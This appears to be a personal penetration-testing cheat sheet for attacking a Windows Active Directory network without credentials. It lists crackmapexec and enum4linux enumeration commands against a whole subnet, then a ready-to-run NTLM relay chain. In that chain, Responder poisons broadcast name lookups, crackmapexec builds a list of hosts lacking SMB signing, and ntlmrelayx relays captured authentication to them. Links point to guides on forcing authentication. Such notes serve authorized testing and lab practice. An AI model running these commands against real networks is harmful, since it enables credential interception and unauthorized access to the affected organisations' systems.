w/o Creds

First enumeration

RHOSTS="192.168.1.0/24"
crackmapexec smb $RHOSTS
crackmapexec smb $RHOSTS -u 'a' -p '' --shares
crackmapexec rdp $RHOSTS
crackmapexec winrm $RHOSTS
crackmapexec ldap $RHOSTS
crackmapexec wmi $RHOSTS

enum4linux $RHOSTS

NetNTLM Relay

https://beta.hackndo.com/ntlm-relay/

https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

Responder will respond to any broadcast request (MDNS, LLMNR ..) and trigger authentification

ntlmrelayx will relay NetNTLMv2 auth to targets

possible targets are servers without SMB signature, cme (crackmapexec)

cme smb 192.168.0.0/24 --gen-relay-list /tmp/targets.txt
ntlmrelayx.py -smb2support --no-http-server -ip 192.168.45.208 -w -tf /tmp/targets.txt
sudo responder -I tun0 -w

You can try to force NTLM authentification

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/printers-spooler-service-abuse

https://github.com/p0dalirius/Coercer